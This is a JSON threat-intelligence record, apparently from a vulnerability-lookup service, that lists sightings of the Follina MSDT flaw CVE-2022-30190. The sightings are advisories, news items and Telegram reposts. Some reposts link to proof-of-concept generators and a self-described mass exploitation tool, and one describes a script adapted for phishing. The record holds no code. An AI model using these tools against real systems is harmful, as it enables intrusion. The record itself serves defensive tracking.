{"vulnerability": "CVE-2022-3019", "sightings": [{"uuid": "910fefac-0270-4967-b84a-77a8f1858ccd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/b7effe8d-f245-44fd-94ef-5f2f693cfb06", "content": "", "creation_timestamp": "2022-09-30T08:50:28.000000Z"}, {"uuid": "75760ae9-9019-4d3f-ab6d-99f2a7d38538", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/c8255e2a-36b1-4d59-805a-aeb73aa8e929", "content": "", "creation_timestamp": "2022-06-21T18:38:00.000000Z"}, {"uuid": "35b78d10-3136-419d-91fd-41142c2125ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/3410ad13-ef34-48c9-bc6f-b1b111a30e06", "content": "", "creation_timestamp": "2022-06-23T13:12:55.000000Z"}, {"uuid": "a0a2cf86-7566-40b6-9083-8ae8456f113c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/99138053-ae5d-4bcf-b2f8-0954edb204bc", "content": "", "creation_timestamp": "2022-11-01T20:54:34.000000Z"}, {"uuid": "6a32a493-934b-4714-96cf-b465b946c6b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2023-06-14T21:10:04.000000Z"}, {"uuid": "d1293f12-e28c-439d-ab8d-86b033275394", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", 
"source": "MISP/e7824ab3-14c8-4fc3-ada2-930b0487144c", "content": "", "creation_timestamp": "2022-06-21T06:36:06.000000Z"}, {"uuid": "22ae57ed-180a-4e4a-8366-690e3eec2413", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://msrc.microsoft.com/blog/2022/05/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", "content": "", "creation_timestamp": "2022-05-30T05:00:00.000000Z"}, {"uuid": "5545302c-24ca-462d-a85f-1aa82f714bdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/a67c65c39634310289635ecf99dea9a6", "content": "", "creation_timestamp": "2025-01-07T11:17:15.000000Z"}, {"uuid": "54cf600f-a2ec-44bf-bcf5-771251e358ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971663", "content": "", "creation_timestamp": "2024-12-24T20:32:30.507284Z"}, {"uuid": "ef5800b2-3d92-4ce1-b83d-dcad2c07ec0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/3a597fc9e98398f18b8f135687964a65", "content": "", "creation_timestamp": "2025-02-07T07:21:16.000000Z"}, {"uuid": "60b8af5e-ee6f-449c-88bf-00eddada910c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:45.000000Z"}, {"uuid": 
"7af661e6-b399-44a9-beb0-93369e25ffa4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://bsky.app/profile/redteamnews.bsky.social/post/3ll3dsf4wsv24", "content": "", "creation_timestamp": "2025-03-23T22:59:31.372080Z"}, {"uuid": "a250de35-b8e0-4cf0-b69d-e1437c8ad258", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:46.000000Z"}, {"uuid": "cab41f2f-ce32-4dfe-9850-7eb20122850e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:37.000000Z"}, {"uuid": "ca6f3b44-1a0e-41b3-9e5f-747256d94b17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://bsky.app/profile/hackingne.ws/post/3lleoqhxjgv2l", "content": "", "creation_timestamp": "2025-03-27T16:09:15.956404Z"}, {"uuid": "ce9eed15-48a5-4001-bd35-410849a6769b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/c8255e2a-36b1-4d59-805a-aeb73aa8e929", "content": "", "creation_timestamp": "2025-04-11T08:52:00.000000Z"}, {"uuid": "6993d5d8-8eeb-4aa1-b568-0db847976627", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": 
"https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/word_msdtjs_rce.rb", "content": "", "creation_timestamp": "2022-06-06T20:02:58.000000Z"}, {"uuid": "6f168bc1-30ed-4dfa-8519-5cb739eb4f86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-5160f4b6-f5bea135b10e56d0", "content": "", "creation_timestamp": "2025-06-11T13:05:26.587857Z"}, {"uuid": "d73f967d-a96e-4668-9b5e-6b38ff39f5d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/1f469f99675752c7ae1749a43429185d", "content": "", "creation_timestamp": "2025-04-27T13:33:59.000000Z"}, {"uuid": "9e131209-76ee-43a8-8b1f-558691318df1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/356b6be98f75b1f7f00096fb3de09f7d", "content": "", "creation_timestamp": "2025-07-01T16:33:57.000000Z"}, {"uuid": "cd1dc2eb-2db9-4275-971b-274cf7e9900f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://bsky.app/profile/jos1264.social.skynetcloud.site.ap.brid.gy/post/3luo32nqinkl2", "content": "", "creation_timestamp": "2025-07-23T22:30:32.549661Z"}, {"uuid": "42bc957c-ef3d-4c85-86f0-c71a3212cf79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/09dc4628be4c6acef1445113651a4bbd", "content": "", 
"creation_timestamp": "2025-09-01T15:01:42.000000Z"}, {"uuid": "27803992-4c70-43e9-9ca0-9562f7930e1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/19e3f897ebc190a0d9fba1ddb254e07f", "content": "", "creation_timestamp": "2025-08-01T15:12:03.000000Z"}, {"uuid": "14d645c4-33bb-4fd4-9d86-3da7d09a4334", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/ef4f79882a9a998824e5edb9a9c39d9f", "content": "", "creation_timestamp": "2025-10-31T22:18:16.000000Z"}, {"uuid": "e1d146b4-84ea-40f3-b6ec-7dbd68ee66ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2022-30190", "type": "seen", "source": "https://www.cert.at/de/warnungen/2022/5/remote-code-execution-schwachstelle-in-microsoft-windows-workarounds-verfugbar", "content": "", "creation_timestamp": "2022-05-31T13:31:13.000000Z"}, {"uuid": "70b2a4c6-a351-404e-99ac-a555611cdbca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/ab0b745f-bbd5-338e-8b92-97dd0c757e9d", "content": "", "creation_timestamp": "2025-08-31T03:01:00.000000Z"}, {"uuid": "74158ae8-b8f1-48e3-944b-210cd22dba18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/244584afa823b7a82f1fc04b52872393", "content": "", "creation_timestamp": "2025-10-01T19:45:44.000000Z"}, {"uuid": "9d218953-990b-4ee2-b83e-c5e65c89f4e4", 
"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/7c1fa1521d76b91a66875cf22cc1dbf2", "content": "", "creation_timestamp": "2025-12-01T07:56:27.000000Z"}, {"uuid": "443a3e46-fc7c-456a-819f-f0bc5b237d78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://sploitus.com/exploit?id=11EF8E6B-7CBD-5758-94E1-220BF0F529A7", "content": "", "creation_timestamp": "2025-10-18T09:43:12.000000Z"}, {"uuid": "b65f93c7-1058-433a-bbf0-30d2d2d97881", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/ca50029f36cfd4b84b9f9e5785d4a904", "content": "", "creation_timestamp": "2026-03-04T12:43:32.000000Z"}, {"uuid": "edbd850f-ae8e-4cc0-9010-3cf4db43d7ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://bsky.app/profile/pigondrugs.bsky.social/post/3mgfs726gpy2b", "content": "", "creation_timestamp": "2026-03-06T17:03:59.589984Z"}, {"uuid": "0d42ede6-b532-47c1-8ff8-972f4ce71d41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/7956a2cb84c64f8278087c33a21a2617", "content": "", "creation_timestamp": "2026-01-03T10:10:27.000000Z"}, {"uuid": "1b051cc6-0648-43bf-9ac4-2ab83779ca0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": 
"CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/f0ea883416140b0333e5b1d33f3751c8", "content": "", "creation_timestamp": "2026-02-02T12:06:45.000000Z"}, {"uuid": "36af6b22-081e-475e-b7e5-791b1395406e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2379", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 Zero click rce Mass Exploitation Tool with Multi threading capabilities\nURL\uff1ahttps://github.com/Kesinger57/CVE-2022-30190-mass-rce\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T17:39:40.000000Z"}, {"uuid": "25fb4c5d-bcb0-47a4-acb8-465cc1184bbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/23f2147b9bc46faaa2ed0d46e177aee6", "content": "", "creation_timestamp": "2026-04-03T14:42:52.000000Z"}, {"uuid": "87d0fc62-7795-4ec7-ad01-93aa7f43051a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://www.kyberturvallisuuskeskus.fi/fi/haavoittuvuus_10/2022", "content": "", "creation_timestamp": "2022-05-31T08:23:44.000000Z"}, {"uuid": "a5cb34a6-b197-4c4b-b7ab-4a2cd772b3f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/fdda4963-0aa7-4d15-8a8f-969db8f304ca", "content": "", "creation_timestamp": "2025-02-28T23:49:13.272798Z"}, {"uuid": 
"96913d0b-6db9-4a0e-9d29-b289801b136a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=813", "content": "", "creation_timestamp": "2022-05-31T04:00:00.000000Z"}, {"uuid": "543d35ac-c3ee-4065-8904-ea4e9200e45d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=821", "content": "", "creation_timestamp": "2022-06-15T04:00:00.000000Z"}, {"uuid": "3eaa0b68-d3ed-4795-9b0e-6114e2c659ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/a24c34a5-ecd1-4d12-8e98-0503826daa06", "content": "", "creation_timestamp": "2026-02-02T12:27:20.086211Z"}, {"uuid": "b15b3c84-ce2b-4af3-81ad-58d46b09991e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2372", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMitigates the \\\"Folina\\\"-ZeroDay (CVE-2022-30190)\nURL\uff1ahttps://github.com/derco0n/mitigate-folina\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T09:38:03.000000Z"}, {"uuid": "6c41a0bc-0594-42d0-9300-c1044f1fb2b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": 
"https://t.me/BleepingComputer/12319", "content": "Latest news and stories from BleepingComputer.com\nRussian hackers start targeting Ukraine with Follina exploits\n\nUkraine's Computer Emergency Response Team (CERT) is warning that the Russian hacking group Sandworm may be exploiting Follina, a remote code execution vulnerability in Microsoft Windows Support Diagnostic Tool (MSDT) currently tracked as CVE-2022-30190. [...]", "creation_timestamp": "2022-06-13T18:30:05.000000Z"}, {"uuid": "472eb34a-9d79-4ffb-92b9-d79175325469", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/BleepingComputer/12317", "content": "Russian hackers start targeting Ukraine with Follina exploits\n\nUkraine's Computer Emergency Response Team (CERT) is warning that the Russian hacking group Sandworm may be exploiting Follina, a remote code execution vulnerability in Microsoft Windows Support Diagnostic Tool (MSDT) currently tracked as CVE-2022-30190. 
[...]\n\nhttps://www.bleepingcomputer.com/news/security/russian-hackers-start-targeting-ukraine-with-follina-exploits/", "creation_timestamp": "2022-06-13T18:29:49.000000Z"}, {"uuid": "083e8663-9e75-4207-a5a0-05da1b0c1756", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2376", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aThe CVE-2022-30190-follina Workarounds Patch\nURL\uff1ahttps://github.com/sentinelblue/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T14:35:29.000000Z"}, {"uuid": "03f9897c-f933-42dc-8f76-133fbc0a662e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2440", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMicrosoft MS-MSDT Follina (0-day Vulnerability) CVE-2022-30190 PoC\nURL\uff1ahttps://github.com/IamVSM/msdt-follina\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-06T09:16:45.000000Z"}, {"uuid": "68df786d-4558-40ab-9822-a1173422d1c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2510", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aExtract payload URLs from Follina (CVE-2022-30190) docx and rtf files\nURL\uff1ahttps://github.com/MalwareTech/FollinaExtractor\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": 
"2022-06-15T02:38:56.000000Z"}, {"uuid": "822b980c-c09c-4af8-ae89-0e6885796550", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2599", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 powerpoint version\nURL\uff1ahttps://github.com/Gra3s/CVE-2022-30190-PowerPoint\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-29T08:55:03.000000Z"}, {"uuid": "34f01424-d37a-4d40-80e9-9ede5e6b6226", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/cKure/9665", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Zero-Day: Exploit code for Microsoft Windows Support Diagnostic Tool RCE.\n\n\nhttps://github.com/NafisiAslH/KnowledgeSharing/tree/main/CyberSecurity/Web/CVEs/CVE-2022/CVE-2022-30190", "creation_timestamp": "2022-06-05T06:52:17.000000Z"}, {"uuid": "fc96a364-bae5-4f9d-ad55-fcbbfd73cec1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/cKure/9750", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Follina patch CVE-2022-30190. (msdt.exe) is out.  
\n\nhttps://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190", "creation_timestamp": "2022-06-15T09:39:46.000000Z"}, {"uuid": "0068ef32-c718-4136-90b1-2966da7e7563", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/5180856b-d3c5-4036-9201-94693724365c", "content": "", "creation_timestamp": "2026-04-19T22:25:34.000000Z"}, {"uuid": "d97ca475-1454-43c9-aa7e-7aa12dcdd889", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2364", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMS-MSDT Follina CVE-2022-30190 PoC document generator\nURL\uff1ahttps://github.com/sudoaza/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T23:34:44.000000Z"}, {"uuid": "96c0da42-43e5-49c0-a889-53c98b2399a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2363", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aProof of Concept zu MSDT-Follina - CVE-2022-30190. 
\u00dcBERPR\u00dcFUNG DER WIRKSAMKEIT VON MICROSOFT DEFNEDER IN DER JEWEILS AKTUELLSTEN WINDOWS 10 VERSION.\nURL\uff1ahttps://github.com/ImproveCybersecurityJaro/2022_PoC-MSDT-Follina-CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T23:12:47.000000Z"}, {"uuid": "3693d8ab-153c-4bdd-943f-421f8a9e27cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2378", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 | MS-MSDT Follina One Click\nURL\uff1ahttps://github.com/AchocolatechipPancake/MS-MSDT-Office-RCE-Follina\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T22:59:39.000000Z"}, {"uuid": "777a2422-e630-4f06-ab73-1f54158253ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2377", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aPDQ Package I created for CVE-2022-30190\nURL\uff1ahttps://github.com/castlesmadeofsand/ms-msdt-vulnerability-pdq-package\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T15:37:01.000000Z"}, {"uuid": "0687f47a-3397-445d-90d9-4368ebcb319e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/BleepingComputer/12587", "content": "XFiles info-stealing malware adds support for Follina delivery\n\nThe XFiles info-stealer malware has added a delivery module that exploits CVE-2022-30190, aka 
Follina, for dropping the payload on target computers. [...]\n\nhttps://www.bleepingcomputer.com/news/security/xfiles-info-stealing-malware-adds-support-for-follina-delivery/", "creation_timestamp": "2022-06-30T14:24:55.000000Z"}, {"uuid": "0bd39e81-81e2-4a7a-ab26-37a8e1bbd4e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2375", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aThe CVE-2022-30190-follina Workarounds Patch\nURL\uff1ahttps://github.com/suegdu/CVE-2022-30190-Follina-Patch\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T14:11:44.000000Z"}, {"uuid": "3a125ccd-3cef-4ae4-adf2-5b3251eecced", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2374", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190-follina.py-\u4fee\u6539\u7248\uff0c\u53ef\u4ee5\u81ea\u5b9a\u4e49word\u6a21\u677f\uff0c\u65b9\u4fbf\u5b9e\u6218\u4e2d\u9493\u9c7c\u4f7f\u7528\u3002\nURL\uff1ahttps://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T12:46:47.000000Z"}, {"uuid": "c95b73b5-455b-4d97-8a7a-c143b195f464", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2446", "content": 
